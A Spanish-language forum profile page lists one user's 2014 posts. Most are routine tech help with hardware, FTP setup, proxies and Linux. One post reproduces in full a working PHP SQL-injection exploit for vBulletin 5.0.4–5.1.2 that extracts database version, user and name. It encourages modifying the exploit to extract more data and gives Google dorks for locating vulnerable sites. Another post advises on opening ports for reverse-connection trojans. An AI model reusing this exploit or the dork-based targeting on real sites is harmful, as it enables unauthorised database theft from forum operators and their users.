Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Stiuvert

Páginas 1 ... 97 98 99 100 101 ... 132
#1961
Noticias Informáticas / X Fórum AUSAPE 2014: Un decálogo de seguridad maligno
Julio 27, 2014, 07:00:35 AM
Charla de Chema Alonso con mucho humor sobre Seguridad informática, metadatos entre otros celabrado en Zaragoza (España).




El pasado mes de Junio, en la bella ciudad de Zaragoza, estuve como ponente invitado en el X Fórum AUSAPE 2014 para dar una charla. La conferencia se grabó y hace unos días la habían publicado. Yo la he recuperado y la he puesto aquí. Esta conferencia se basa en el Decálogo de Seguridad Maligno que ya había publicado hace unos años por aquí.




Imágenes sobre la conferencia:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#1962
Bugs y Exploits / Re:Inyección SQL en foros vBulletin 5.0.4 a 5.1.2 (Exploit + vídeo)
Julio 26, 2014, 02:07:38 PM
Estaba la fuente mi compañero Snifer! xD

#1963
Bugs y Exploits / Inyección SQL en foros vBulletin 5.0.4 a 5.1.2 (Exploit + vídeo)
Julio 26, 2014, 12:52:41 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hace unos días se supo de una You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, pero como siempre primero me gusta verificar y recién hoy se ha publicado en PacketStorm una versión pública ya que en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login ya se encontraba pero para acceder a él hay que pagar...



vBulletin es un software
desarrollado por vBulletin Solutions, para la creación y mantenimiento de foros
en Internet. Está basado en PHP y MySQL y según la propia compañía más de
100.000 sitios funcionan bajo este sistema.


Según confirma vBulletin, el
problema afecta a las versiones 5.0.4, 5.0.5, 5.1.0, 5.1.1 y 5.1.2. El grupo
Romanian Security Team (RST) ha publicado un vídeo en el que se muestra la
vulnerabilidad y confirma el reporte a vBulletin, que ofrecerán todos los
detalles tras la publicación del parche.



La vulnerabilidad permite a un usuario malicioso realizar ataques de inyección
SQL sobre la base de datos, con todas las implicaciones que ello puedo
llevar. Es decir, extraer toda la
información y contenido de la base de datos, e incluso a partir de ahí
comprometer todo el sistema.



El exploit que se ha publicado nos permite obtener la versión, nombre y usuario de la base de datos, para obtener datos más jugosos debéis modificar el exploit:


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Código: text

<?php
 
/*
    Author: Nytro
    Powered by: Romanian Security Team
    Price: Free. Educational.
*/
 
 
error_reporting(E_ALL);
ini_set('display_errors', 1);
 
 
// Get arguments
 
 
$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);
 
 
// Function to send a POST request
 
 
function httpPost($url,$params)
{
    $ch = curl_init($url);
 
 
    curl_setopt($ch, CURLOPT_URL,$url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
     
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'X-Requested-With: XMLHttpRequest',
        'Referer: https://rstforums.com/v5/memberlist',
        'Accept-Language: en-US,en;q=0.5',
        'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
     ));
 
 
    $output = curl_exec($ch);
     
    if($output == FALSE) print htmlspecialchars(curl_error($ch));
 
 
    curl_close($ch);
    return $output;
}
 
 
// Function to get string between two other strings
 
 
function get_string_between($string, $start, $end)
{
    $string = " ".$string;
    $ini = strpos($string,$start);
    if ($ini == 0) return "";
    $ini += strlen($start);
    $len = strpos($string,$end,$ini) - $ini;
    return substr($string,$ini,$len);
}
 
 
// Get version
 
 
print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";
print "Version: ";
 
 
$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
 
 
$letter = 1;
 
 
while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
 
 
    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];
     
    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(  ),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
 
 
// Get user
 
 
print "\r\nUser: ";
 
 
$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
 
 
$letter = 1;
 
 
while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
 
 
    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];
 
 
    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
 
 
// Get database
 
 
print "\r\nDatabse: ";
 
 
$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  1,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
 
 
$letter = 1;
 
 
while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
 
 
    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];
 
 
    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  ' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
 
 
print "\r\n"
 
 
?>



You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Google ya ha bloqueado una posible busqueda del dork necesario para buscar sitios afectados, por ejemplo:

"Powered by vBulletin® Version 5.1.2"
"Powered by vBulletin® Version 5.0.4"
"Powered by vBulletin® Version 5.0.5"
"Powered by vBulletin® Version 5.1.0"
"Powered by vBulletin® Version 5.1.1"

Pero si buscan con You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login encontrarán resultados.

Fuentes:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



Fuente Original: Blackploit
#1964
Dudas y pedidos generales / Re:Actualizar NoIP remotamente
Julio 26, 2014, 11:01:23 AM
Lógicamente de esa forma puedo

Mi problema es hacerlo a distancia, es decir, desde mi casa poder administrarlo y saber esa IP pública.


Saludos

Enviado desde mi Smartphone
#1965
Dudas y pedidos generales / Re:[Ayuda]Crear Usuario FTP y que solo pueda accesar a una carpeta especifica
Julio 26, 2014, 10:56:40 AM
Puedes implementar "vsftpd" en tu Ubuntu Server, y configurarlo de tal forma para que se puedan autentificar usuarios de tu sistema. Además para que estos usuarios no puedan cambiar de directorio y ver cosas que no deberían de ver se podría enjaularlos en su /home que es lo que vienes preguntando.

Estuve googleando un poco para buscarte información sobre vsftpd y su configuración para que puedas entenderlo y aplicarlo.

www.mauriciomatamala.net/PAR/vsftp.php


Un saludo

Enviado desde mi Smartphone
#1966
Dudas y pedidos generales / Re:Problemas con troyanos de conexión inversa
Julio 26, 2014, 08:58:35 AM
El problema será del puerto, tiene que estar abierto en TCP con tu dirección IP local (la puedes mirar en cmd con ipconfig).

El puerto que abras que no sea uno utilizado como por ejemplo el 80. Utiliza un 4662, 2000 etc


Saludos

Enviado desde mi Smartphone
#1967
Dudas y pedidos generales / [SOLUCIONADO] Actualizar NoIP remotamente
Julio 26, 2014, 08:19:01 AM
Buenos días,

Estoy buscando un método para actualizar una cuenta NoIP remotamente, sé que entrando desde la web se puede actualizar la IP de forma manual pero como consigo saber la IP pública de un router el cual tengo acceso físico?

Este router no dispone de PC por lo tanto no se puede acceder de esa forma.


Saludos





Enviado desde mi Smartphone
#1968
Dudas y pedidos generales / Re:Problema al bootear wifislax
Julio 26, 2014, 08:06:54 AM
Yo utilizo "Linux USB Creador" para grabar las ISO de Linux en un pendrive y nunca tuve problemas, lo recomiendo.

Con copiar solo la ISO o los archivos de dentro en la raíz de tu Pen no es suficiente.



Saludos
#1969
Debates, Reviews y Opiniones / Re:[DEBATE] ¿Cuál es el lenguaje ideal para aprender a programar?, ¿por qué?
Julio 25, 2014, 09:30:13 AM
Python es lo ideal, yo empecé con ese lenguaje y luego te es mucho más sencillo entender y programar en C que es un lenguaje más poderoso y donde se podrán desarrollar muchas más cosas.


Saludos
#1970
Redes y antenas / Re:Simulador de redes y Cisco IOS Image
Julio 25, 2014, 05:48:33 AM
Yo todo lo que he aprendido en la asignatura de Redes es gracias a este programa, un simular de 10!


Saludos
#1971
Dudas y pedidos generales / Re:Overclocking Intel (R) G41 Express Chipset
Junio 27, 2014, 06:12:53 AM
Hay un programa llamado "Everest", muy conocido que te analiza todo tu Hardware y te dice todos los componentes de tu máquina, tus temperaturas etc etc



Descarga Everest y cuando lo abras te vas a "Equipo > Resumen" y ahí verás el nombre de tu "Motherboard" y "Tarjeta de vídeo".


Un saludo
#1972
Windows / Re:Emulando Android desde Virtual Box
Junio 27, 2014, 03:39:01 AM
VirtualBox permite virtualizar casi cualquier sistema operativo, es como si tuvieras sistemas operativos lógicos dentro de tu PC con un sistema operativo instalado físicamente en tu disco.

Si estudias informática veras que esto cada vez se está usando más en empresas donde virtualizar sistemas operativos además de ser cómodo por administrarlo es a la vez muy económico. Puedes hacer copias de seguridad rápidamente, mover sistemas en caliente de un servidor a otro etc.

En definitiva, es algo que cada vez se utilizará más


PD: se agradece el aporte

Saludos

Enviado desde mi Smartphone

#1973
Dudas y pedidos generales / Re:Overclocking Intel (R) G41 Express Chipset
Junio 27, 2014, 03:25:35 AM
No muestras la placa pero viendo el procesador que tienes seguro que soporta PCIe tu motherboard.

No sabría decirte el motivo de que no funcione... Solamente es sustituir una por la otra y ya funcionaría, y mas con Windows 7 que lo reconoce perfectamente y ya instalaría drivers automáticamente.


Saludos



Enviado desde mi Smartphone

#1974
Dudas y pedidos generales / Re:Overclocking Intel (R) G41 Express Chipset
Junio 26, 2014, 05:14:30 PM
¿Qué placa base tienes?

Soporta PCIe x16 ??
#1975
Noticias Informáticas / Re:Google entra en el negocio de registro de dominios
Junio 26, 2014, 03:27:42 PM
Si quieren ganar dinero con dominios para después revenderlos pueden aprovechar ahora que son nuevos y habrán muchos libres.

Del tipo:

.tienda
.email
.futbol
.hotel
.web

Quizás algún día alguna empresa como por ejemplo Cocacola, ebay o vete a saber quién os hace una compra por vuestro dominio. Sé de gente que lo está haciendo actualmente para después ganar algo de dinero por el interés de alguna empresa  :P


Un saludo!
#1976
Dudas y pedidos generales / Re:Overclocking Intel (R) G41 Express Chipset
Junio 26, 2014, 03:20:55 PM
¿Por qué no consigues que funcione?

Una vez conectado al PCIe x16 de tu placa base tienes que instalar los Drivers de la página web oficial para tu tarjeta gráfica.


Un saludo
#1977
Dudas y pedidos generales / Re:[Ayuda] Problema con manejo de Proxys
Junio 26, 2014, 08:58:32 AM
Usando Hotspot saben tu IP pública real? Comprueba tu dirección IP en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Si navegando con proxy desenmascaran tu IP puede ser que tengan un filtro para desenmascarar proxys.

Usando Tor no hace falta configurar nada, solamente es activar y navegar.



Un saludo

Enviado desde mi Smartphone

#1978
Dudas y pedidos generales / Re:Overclocking Intel (R) G41 Express Chipset
Junio 23, 2014, 08:07:01 PM
Una gráfica de ese tipo la tienes tirada de precio, la memoria de vídeo es importante a cierto modo, 64MB es poquísimo.

Un ssaludo
#1979
Dudas y pedidos generales / Re:Overclocking Intel (R) G41 Express Chipset
Junio 23, 2014, 12:48:28 PM
Postea los requisitos gráficos del juego y las características de tu tarjeta gráfica y te podré ayudar.


Saludos
#1980
Dudas y pedidos generales / Re:Ayuda Con mi Ubuntu
Junio 23, 2014, 05:55:41 AM
No puede cargar la interface, podrías hacer un install desde de la terminal de una interface (Gnome, kde etc).

Saludos
Páginas 1 ... 97 98 99 100 101 ... 132